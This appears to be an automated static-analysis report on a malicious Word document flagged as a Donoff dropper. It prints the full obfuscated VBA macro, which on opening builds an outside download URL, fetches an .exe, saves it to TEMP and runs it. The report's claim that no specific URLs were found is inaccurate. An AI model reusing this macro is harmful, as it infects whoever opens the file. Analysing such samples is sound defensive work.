Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 195812eceffaf432…

MALICIOUS

Office (OLE)

77.5 KB Created: 2016-05-12 23:30:00 Authoring application: Microsoft Office Word First seen: 2018-04-30
MD5: 8ce3311b8149d0a329e7f1495f4d163a SHA-1: 3ba9d7c955e4965993aae80582f07dc7143e6f7d SHA-256: 195812eceffaf43239d0eb7c5a476f6f7922ee944c6d019dd0bba3d8dd1d09b0
330 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1059 Command and Scripting Interpreter

The sample is a malicious Office document containing VBA macros. The macros heavily utilize WScript.Shell and CreateObject, indicating an intent to execute arbitrary commands. The presence of 'Doc.Dropper.Donoff-5743530-0' in ClamAV detection further supports its role as a dropper. The obfuscated nature of the VBA code and the lack of specific URLs or executable payloads prevent a more precise family attribution.

Heuristics 10

  • ClamAV: Doc.Dropper.Donoff-5743530-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Donoff-5743530-0
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    Dim eWpWEh As Boolean, FxaIym As String
Set SHXSnRT = CreateObject("WScript.Shell")
End Function
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Dim eWpWEh As Boolean, FxaIym As String
Set SHXSnRT = CreateObject("WScript.Shell")
End Function
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
    Matched line in script
    Public Sub UKejTxQEbq(ByVal sYjWsiUzz As Integer, ByVal vOOXhIoYVI As Object, ByVal ScJkfRq As String)
CallByName vOOXhIoYVI, ScJkfRq, 1
End Sub
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    End Sub
Private Sub Document_Open()
Dim YnwozAvBvp As Boolean
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8735 bytes
SHA-256: f877c7208b7ffe3a98aaec958355775c4ffa5c773e6aa9b08082a9291d47e38a
Detection
ClamAV: No threats found
Obfuscation or payload: likely
141 of 223 identifiers look randomly generated (e.g. 'ReXsGOpoqnOsOeqBGOoqdyG') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub BfTPqWs(ByVal gIufA As String, ByVal LacFrq As String)
wHTiRT
If mjspzU(9002, 675, "bKN") Then
jGxNa True, "6EfP", "TYl"
QwNZHX
tmRfIVJh 807
End If
End Sub
Private Sub qrFHup(ByVal NpYBFBTzJV As Integer)
YoQROe 280, "", 3880
nSBNYIEqi
szgGkotf 3197, "i5GxS", True
End Sub
Private Sub Document_Open()
Dim YnwozAvBvp As Boolean
BNcHSGIJf.ZtMEX
End Sub
Private Sub nQCIq()
mqxGfUKgzi 6499, "0n", "0tZ"
MmaltzrlX 1715
If hBTkqIt("8Z") Then
rRoMb
Else
yqyGeqxn
End If
End Sub
Private Function wltuwyHn() As String
yhlAeROGu
wltuwyHn = "cD9E0"
End Function

Attribute VB_Name = "BNcHSGIJf"
Private Function OoEhMR(ByVal IjOsYr As String, ByVal TSFvPrL As String) As String
Dim AcxihNg As Integer
Set QskLZ = gKboyvolPW.onTdFDT(xPlhhpH, HFeAw.SHXSnRT, nXpSrndefO.nSbtX("P3RAWOVCVES3VS", ".A3VW"))
OoEhMR = QskLZ(IjOsYr)
End Function
Private Function YWCQbqQv() As String
YWCQbqQv = nXpSrndefO.nSbtX("OYp4eCnC", "CY4 ")
End Function
Private Function xPlhhpH() As String
xPlhhpH = nXpSrndefO.nSbtX("E8nYYvGirbYoGnbm8eBnGt", "8bBGYX")
End Function
Private Function QHdHkw() As String
QHdHkw = ""
End Function
Private Sub sxrYjwcZt(ByVal eFqbNX As String, ByVal IRYwspeX As String)
Set fcZJtgcx = HFeAw.icTvlKd
gKboyvolPW.TwbrZBW GVNMSNRg, nXpSrndefO.nSbtX("OYp4eCnC", "CY4 "), eFqbNX, fcZJtgcx, False
gKboyvolPW.fFqjHYA nXpSrndefO.nSbtX("UJsJJerj-JJAjgJeJnGt", "GJj"), IOqJAN, 2963, nXpSrndefO.nSbtX("Mv5ovzviluvl5av/45v.0uv 5(cvvomv5pautuiuvbvle5;5u)", "5uv"), PhmNCS, fcZJtgcx
gKboyvolPW.UKejTxQEbq 1177, fcZJtgcx, mXKRQdOau
ZnkGjY True, 6317, IRYwspeX, gKboyvolPW.KYKlnqZg(PhmNCS, vOCyopiJ, fcZJtgcx)
End Sub
Private Function vOCyopiJ() As String
vOCyopiJ = nXpSrndefO.nSbtX(".ReXsGOpoqnOsOeqBGOoqdyG", ".GXqO")
End Function
Private Sub hHUoZB()
Dim POgVyR As Integer
OIRUtHf = True
On Error GoTo OrzQWZ
zIxdob = False
sxrYjwcZt buIGdYS, npxWtFU
kaoTXVXkN npxWtFU
Exit Sub
OrzQWZ:
End Sub
Private Function npxWtFU() As String
Dim KubjUDj As Integer, hIKrUpMu As Integer
npxWtFU = OoEhMR(nXpSrndefO.nSbtX("ZTEUMZsP", "9cZUsX"), "Y1v") & zXknZ
End Function
Private Function IusMN() As String
IusMN = nXpSrndefO.nSbtX("nTyHpaeB", "HBaqXn")
End Function
Private Function zXknZ() As String
Dim KfyJzS As Integer
Dim AHkxT As Integer
JJNlxuFaS = True
zXknZ = bTDZVlILY
End Function
Private Sub kaoTXVXkN(ByVal TZgTSAD As String)
gKboyvolPW.ErXEws "jMid", HFeAw.SHXSnRT, 7188, TZgTSAD, nXpSrndefO.nSbtX("kEx2eI1c", "k31IG2")
End Sub
Private Function PhmNCS() As String
PhmNCS = "p9rRo"
End Function
Public Sub ZtMEX()
Dim NaNnhcwVfC As Integer
Dim kHPhC As Boolean
kZsag = 4121
hHUoZB
End Sub
Private Function mQNhWUO() As String
mQNhWUO = nXpSrndefO.nSbtX("YClm/o/s0e", "0dY/m")
End Function
Private Function buIGdYS() As String
Dim XEwEOMUzxV As Integer
buIGdYS = nXpSrndefO.nSbtX("hBtYUtpYU:Y//YmYaYBgUaBzYinUBesYeUYmUprUeYbBeYlUlBUaU.cYoBYmB/UsBysUtYeUmUY/BcUacBhBeUY/UwoBrUUdY.eYYxUe", "YUB")
End Function
Private Sub ZnkGjY(ByVal uCxjt As Boolean, ByVal tVohFulJeC As Integer, ByVal lpiZGvB As String, ByVal BbwKFO As Variant)
Dim uGsiyUgO As Boolean
Dim LwOWyH As Integer
Set mvsPNLlAV = HFeAw.TAjwX
gKboyvolPW.WhuHkLtpyX True, 1, mvsPNLlAV, IusMN
gKboyvolPW.UKejTxQEbq 1177, mvsPNLlAV, YWCQbqQv
uRUxACPwrk = 5904
gKboyvolPW.ErXEws QHdHkw, mvsPNLlAV, 7188, BbwKFO, nXpSrndefO.nSbtX("Wbbribtzek", "Zzlmkb")
sIbLjqP = "5LP"
gKboyvolPW.fFqjHYA lpiZGvB, FuSmp, 2963, 2, QHdHkw, mvsPNLlAV
gKboyvolPW.UKejTxQEbq 1177, mvsPNLlAV, mQNhWUO
End Sub
Private Function GVNMSNRg() As String
XBoKEL = False
GVNMSNRg = nXpSrndefO.nSbtX("G.E TB", ".BA ")
End Function
Private Function FuSmp() As String
FuSmp = nXpSrndefO.nSbtX("pSraUvremToVUFimlVed", "mprdUV")
End Function
Private Function bTDZVlILY() As String
bTDZVlILY = nXpSrndefO.nSbtX("/76owfbV879w4eo1o8w027fw14Vb5V7a41o.VeoxeV", "V7wo4")
End Function
Private Function IOqJAN() As String
IOqJAN = nXpSrndefO.nSbtX("SEehtELReLlqhuelshhtLHhepaldlelr", "ELlhp")
End Function
Private Function mXKRQdOau() As String
mXKRQdOau = nXpSrndefO.nSbtX("SIerIndr", "MIrG")
End Function

Attribute VB_Name = "dTAeVqABM"
Public Function BdNwvMEm(ByVal aqCHoQvtC As Integer, ByVal KlGnT As Integer, ByVal RuqFRkGeTO As String, ByVal soLVa As String) As String
Dim DnFYLNxTK As Integer, PsDspeSF As Integer
BdNwvMEm = Mid(soLVa, aqCHoQvtC, 1)
End Function
Private Sub IAoav(ByVal vVtILlPA As Integer, ByVal JHjgfI As String)
BkMTwPAnUV "VD0OE", 5936
vVjYXg 5637
If LYvcZvEUHc Then
ZkAFSHcy
RYUrsdm True
aVgAUZYDE 8658, "uMSef", "ZfL4"
End If
nnWkkdeYWI "wQm", "ha3TL", False
tvremm "1fm", "33tj", True
End Sub
Public Function XBiHiIn(ByVal cRDaHNs As Integer, ByVal bVQyokwEy As Boolean, ByVal MTCzGK As String, ByVal zVHZvPgjgN As String) As String
XBiHiIn = zVHZvPgjgN & MTCzGK
End Function
Public Function ZJYkChuWI(ByVal HSKnWCRwr As String, ByVal ZDyiWkTAd As String) As Boolean
Dim hFaLpRS As Integer
ZJYkChuWI = InStr(1, ZDyiWkTAd, HSKnWCRwr)
End Function

Attribute VB_Name = "gKboyvolPW"
Private Sub lByTFHW(ByVal vuMKfoi As Boolean, ByVal ClGUTh As Integer)
QzYClH "TVeg", 8941, "ICWP"
End Sub
Public Sub UKejTxQEbq(ByVal sYjWsiUzz As Integer, ByVal vOOXhIoYVI As Object, ByVal ScJkfRq As String)
CallByName vOOXhIoYVI, ScJkfRq, 1
End Sub
Public Sub TwbrZBW(ByVal GdzeebdNzs As Variant, ByVal DXtzZg As String, ByVal LgruZrTJG As Variant, ByVal sLzTj As Object, ByVal qeXTseW As Variant)
IXNhTW = "Rqwh"
CallByName sLzTj, DXtzZg, 1, GdzeebdNzs, LgruZrTJG, qeXTseW
End Sub
Public Function onTdFDT(ByVal ZmGwXopgt As String, ByVal tiVdYkR As Object, ByVal bfngxtsGS As String) As Variant
Dim UhdIhRB As Integer, bAmMXC As Integer
Set onTdFDT = CallByName(tiVdYkR, ZmGwXopgt, 2, bfngxtsGS)
End Function
Public Sub fFqjHYA(ByVal HzxwWMPHJ As Variant, ByVal eBvIDtdn As String, ByVal wgcgVdLCl As Integer, ByVal Jhseo As Variant, ByVal ECInQEzoq As String, ByVal sJSenS As Object)
CallByName sJSenS, eBvIDtdn, 1, HzxwWMPHJ, Jhseo
End Sub
Public Sub WhuHkLtpyX(ByVal qeYPVdRNPt As Boolean, ByVal OQhYWAJq As Variant, ByVal EDEBCZhlE As Object, ByVal bUwgEcDH As String)
CallByName EDEBCZhlE, bUwgEcDH, 4, OQhYWAJq
End Sub
Private Sub EIEjGL(ByVal KjscLJ As Integer, ByVal WUjEsQf As Integer)
VYZRTX "GbH"
FaPULoVT 5592, "qLHe", ""
End Sub
Public Sub ErXEws(ByVal cWJNSDLZ As String, ByVal ZjgXY As Object, ByVal fOrgGs As Integer, ByVal zcfBqw As Variant, ByVal TlArMRdxcc As String)
CallByName ZjgXY, TlArMRdxcc, 1, zcfBqw
End Sub
Public Function KYKlnqZg(ByVal FFApARY As String, ByVal fAgoVIBX As String, ByVal eryRj As Object) As Variant
Dim SoKMdE As Integer, UNYDxtaaT As Boolean
KYKlnqZg = CallByName(eryRj, fAgoVIBX, 2)
End Function

Attribute VB_Name = "HFeAw"
Private Sub XAavB(ByVal oSvsL As Boolean, ByVal ISnRzNlTb As Integer)
JdrgwQ
End Sub
Public Function SHXSnRT() As Object
Dim eWpWEh As Boolean, FxaIym As String
Set SHXSnRT = CreateObject("WScript.Shell")
End Function
Public Function icTvlKd() As Object
Set icTvlKd = CreateObject("MSXML2.ServerXMLHTTP.6.0")
End Function
Private Sub lROGqM()
If euVWF Then
EqgCajclK 1379, False, "DQx"
End If
End Sub
Private Sub LxmYPeYh(ByVal ljjuPM As String)
rwKYqDFg True, 2503
End Sub
Public Function TAjwX() As Object
Dim HNxmhVPn As Boolean
Set TAjwX = CreateObject("ADODB.Stream")
End Function
Private Function aCtmY() As Integer
scmBSvpTk 2792
lJSsRbNCDs
jTPYG 698, True
upFcL "oC", "nBiN7", 3231
aCtmY = 5750
End Function

Attribute VB_Name = "nXpSrndefO"
Private Function ExYgxKW(ByVal MKoxnesM As Boolean, ByVal qWOHXqk As String) As Boolean
aAnoEkmH
TYWXT
SIYNpFH
If bIFLsWSDYA Then
sjrIRNel
pIxxnGPm True, 5648
Else
oRDnv
GIOdryBDU
End If
ExYgxKW = False
End Function
Public Function nSbtX(ByVal skTWdDv As String, ByVal bRlqXu As String) As String
Dim neEHTjJk As Boolean
Dim mtIwZjkeA As String
crcNfikH = "hDM8W"
For fhinR = 1 To Len(skTWdDv)
neEHTjJk = dTAeVqABM.ZJYkChuWI(dTAeVqABM.BdNwvMEm(fhinR, 5243, otwBaoF, skTWdDv), bRlqXu)
If Not neEHTjJk Then
nSbtX = dTAeVqABM.XBiHiIn(2102, True, dTAeVqABM.BdNwvMEm(fhinR, 5243, otwBaoF, skTWdDv), nSbtX)
fitPL = ""
End If
Next
End Function
Private Function aqoQarrlH() As Integer
ngHBnhTd 5855, 1524
UimfM
kCujVAMx
If zXmQhJr Then
vMylTY
ROzIu
End If
aqoQarrlH = 5758
End Function
Private Function otwBaoF() As String
otwBaoF = "ernX9"
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.